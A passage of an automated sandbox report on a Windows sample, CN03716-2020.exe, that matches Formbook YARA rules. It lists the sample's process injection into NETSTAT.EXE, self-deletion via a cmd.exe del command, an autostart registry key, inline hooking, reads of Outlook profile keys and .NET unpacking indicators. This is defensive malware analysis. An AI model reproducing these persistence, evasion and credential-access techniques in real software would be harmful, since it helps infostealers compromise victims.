            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DCB040 NtSuspendThread,15_2_00DCB040
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9820 NtEnumerateKey,15_2_00DC9820
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC99D0 NtCreateProcessEx,15_2_00DC99D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC95F0 NtQueryInformationFile,15_2_00DC95F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9950 NtQueueApcThread,15_2_00DC9950
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DCAD30 NtSetContextThread,15_2_00DCAD30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9520 NtWaitForSingleObject,15_2_00DC9520
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9A80 NtOpenDirectoryObject,15_2_00DC9A80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9670 NtQueryInformationProcess,15_2_00DC9670
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9A10 NtQuerySection,15_2_00DC9A10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9A00 NtProtectVirtualMemory,15_2_00DC9A00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9A20 NtResumeThread,15_2_00DC9A20
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DCA3B0 NtGetContextThread,15_2_00DCA3B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC97A0 NtUnmapViewOfSection,15_2_00DC97A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DCA770 NtOpenThread,15_2_00DCA770
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9760 NtOpenProcess,15_2_00DC9760
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DCA710 NtOpenProcessToken,15_2_00DCA710
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9730 NtQueryVirtualMemory,15_2_00DC9730
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003E9CA0 NtCreateFile,15_2_003E9CA0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003E9D50 NtReadFile,15_2_003E9D50
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003E9DD0 NtClose,15_2_003E9DD0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003E9E80 NtAllocateVirtualMemory,15_2_003E9E80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003E9C5A NtCreateFile,15_2_003E9C5A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003E9C9A NtCreateFile,15_2_003E9C9A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003E9CF2 NtCreateFile,15_2_003E9CF2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003E9E7A NtAllocateVirtualMemory,15_2_003E9E7A
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_00D795080_2_00D79508
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_00D7C1A80_2_00D7C1A8
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_00D7A7B80_2_00D7A7B8
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F27BD80_2_06F27BD8
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F200400_2_06F20040
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F200060_2_06F20006
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F26EB70_2_06F26EB7
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F26EB80_2_06F26EB8
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F29E980_2_06F29E98
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_070DC4E80_2_070DC4E8
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_004010303_2_00401030
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_0041D3633_2_0041D363
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_00402D873_2_00402D87
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_00402D903_2_00402D90
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_00409E1B3_2_00409E1B
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_00409E203_2_00409E20
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_0041DED53_2_0041DED5
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_0041CEE63_2_0041CEE6
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_00402FB03_2_00402FB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00D9B09015_2_00D9B090
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00E520A815_2_00E520A8
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DB20A015_2_00DB20A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00D9841F15_2_00D9841F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00E4100215_2_00E41002
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00D9D5E015_2_00D9D5E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DB258115_2_00DB2581
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00E51D5515_2_00E51D55
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00D8F90015_2_00D8F900
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00E52D0715_2_00E52D07
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00D80D2015_2_00D80D20
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DA412015_2_00DA4120
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00E52EF715_2_00E52EF7
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00E522AE15_2_00E522AE
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DA6E3015_2_00DA6E30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00E51FF115_2_00E51FF1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00E4DBD215_2_00E4DBD2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DBEBB015_2_00DBEBB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00E52B2815_2_00E52B28
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003ED36415_2_003ED364
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003D2D9015_2_003D2D90
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003D2D8715_2_003D2D87
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003D9E2015_2_003D9E20
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003D9E1B15_2_003D9E1B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003ECEE615_2_003ECEE6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003EDED515_2_003EDED5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003D2FB015_2_003D2FB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 00D8B150 appears 35 times
            Source: CN03716-2020.exeBinary or memory string: OriginalFilename vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000000.00000002.255862873.0000000006F80000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameButterFly.dll< vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000000.00000002.246609407.0000000002788000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEminem.dll< vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000000.00000000.217694353.0000000000287000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIG12.exe. vs CN03716-2020.exe
            Source: CN03716-2020.exeBinary or memory string: OriginalFilename vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000001.00000002.241053176.0000000000147000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIG12.exe. vs CN03716-2020.exe
            Source: CN03716-2020.exeBinary or memory string: OriginalFilename vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000002.00000000.242165279.00000000003E7000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIG12.exe. vs CN03716-2020.exe
            Source: CN03716-2020.exeBinary or memory string: OriginalFilename vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000003.00000002.298291699.00000000018DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000003.00000002.296538583.00000000009F7000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIG12.exe. vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000003.00000002.297720210.0000000001550000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs CN03716-2020.exe
            Source: CN03716-2020.exeBinary or memory string: OriginalFilenameIG12.exe. vs CN03716-2020.exe
            Source: 00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.487540678.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.487540678.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.297494662.00000000011A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.297494662.00000000011A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.246902905.0000000003729000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.246902905.0000000003729000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.296261500.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.296261500.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.487662133.0000000000870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.487662133.0000000000870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.486412389.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.486412389.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.CN03716-2020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.CN03716-2020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.CN03716-2020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.CN03716-2020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: CN03716-2020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: CN03716-2020.exe, Frupal/End.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 0.0.CN03716-2020.exe.250000.0.unpack, Frupal/End.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 0.2.CN03716-2020.exe.250000.0.unpack, Frupal/End.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 1.2.CN03716-2020.exe.110000.0.unpack, Frupal/End.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 1.0.CN03716-2020.exe.110000.0.unpack, Frupal/End.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 2.2.CN03716-2020.exe.3b0000.0.unpack, Frupal/End.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/4@5/2
            Source: C:\Users\user\Desktop\CN03716-2020.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CN03716-2020.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_01
            Source: CN03716-2020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\CN03716-2020.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\0N65N-AB\0N6logri.iniJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: CN03716-2020.exeVirustotal: Detection: 20%
            Source: CN03716-2020.exeReversingLabs: Detection: 25%
            Source: unknownProcess created: C:\Users\user\Desktop\CN03716-2020.exe 'C:\Users\user\Desktop\CN03716-2020.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\CN03716-2020.exe C:\Users\user\Desktop\CN03716-2020.exe
            Source: unknownProcess created: C:\Users\user\Desktop\CN03716-2020.exe C:\Users\user\Desktop\CN03716-2020.exe
            Source: unknownProcess created: C:\Users\user\Desktop\CN03716-2020.exe C:\Users\user\Desktop\CN03716-2020.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CN03716-2020.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess created: C:\Users\user\Desktop\CN03716-2020.exe C:\Users\user\Desktop\CN03716-2020.exeJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess created: C:\Users\user\Desktop\CN03716-2020.exe C:\Users\user\Desktop\CN03716-2020.exeJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess created: C:\Users\user\Desktop\CN03716-2020.exe C:\Users\user\Desktop\CN03716-2020.exeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CN03716-2020.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile written: C:\Users\user\AppData\Roaming\0N65N-AB\0N6logri.iniJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: CN03716-2020.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: CN03716-2020.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: CN03716-2020.exeStatic file information: File size 1524736 > 1048576
            Source: CN03716-2020.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x173800
            Source: CN03716-2020.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: netstat.pdbGCTL source: CN03716-2020.exe, 00000003.00000002.297720210.0000000001550000.00000040.00000001.sdmp
            Source: Binary string: netstat.pdb source: CN03716-2020.exe, 00000003.00000002.297720210.0000000001550000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: CN03716-2020.exe, 00000003.00000002.297933612.000000000174F000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000F.00000002.489598319.0000000000E7F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: CN03716-2020.exe, 00000003.00000002.297933612.000000000174F000.00000040.00000001.sdmp, NETSTAT.EXE

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: CN03716-2020.exe, Frupal/End.cs.Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.CN03716-2020.exe.250000.0.unpack, Frupal/End.cs.Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.CN03716-2020.exe.250000.0.unpack, Frupal/End.cs.Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.2.CN03716-2020.exe.110000.0.unpack, Frupal/End.cs.Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.0.CN03716-2020.exe.110000.0.unpack, Frupal/End.cs.Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.2.CN03716-2020.exe.3b0000.0.unpack, Frupal/End.cs.Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.0.CN03716-2020.exe.3b0000.0.unpack, Frupal/End.cs.Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.CN03716-2020.exe.9c0000.0.unpack, Frupal/End.cs.Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.CN03716-2020.exe.9c0000.1.unpack, Frupal/End.cs.Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F25605 push es; iretd 0_2_06F25618
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F257A3 push es; iretd 0_2_06F257E4
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F25491 push es; ret 0_2_06F2552C
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F25491 push es; retf 0_2_06F255C4
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F25491 push es; retf 0_2_06F25604
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F255C5 push es; retf 0_2_06F25604
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F2552D push es; retf 0_2_06F255C4
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F253E6 push es; ret 0_2_06F253E8
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F253A1 push es; retf 0_2_06F253D4
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F258F5 push es; iretd 0_2_06F258F8
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 0_2_06F2598F push es; iretd 0_2_06F25A58
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_0041796E push edx; iretd 3_2_00417983
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_0041DC4A push es; iretd 3_2_0041DC4B
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_0041CDF5 push eax; ret 3_2_0041CE48
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_0041CE42 push eax; ret 3_2_0041CE48
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_0041CE4B push eax; ret 3_2_0041CEB2
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_0041CEAC push eax; ret 3_2_0041CEB2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DDD0D1 push ecx; ret 15_2_00DDD0E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003E796E push edx; iretd 15_2_003E7983
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003EDC4A push es; iretd 15_2_003EDC4B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003ECDF5 push eax; ret 15_2_003ECE48
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003ECE4B push eax; ret 15_2_003ECEB2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003ECE42 push eax; ret 15_2_003ECE48
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_003ECEAC push eax; ret 15_2_003ECEB2
            Source: initial sampleStatic PE information: section name: .text entropy: 7.18250412051

            Boot Survival:

            barindex
            Creates an undocumented autostart registry key Show sources
            Source: C:\Windows\SysWOW64\NETSTAT.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C6QLSBJump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE0
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CN03716-2020.exeProcess information set: NOOPENFILEERRORBOX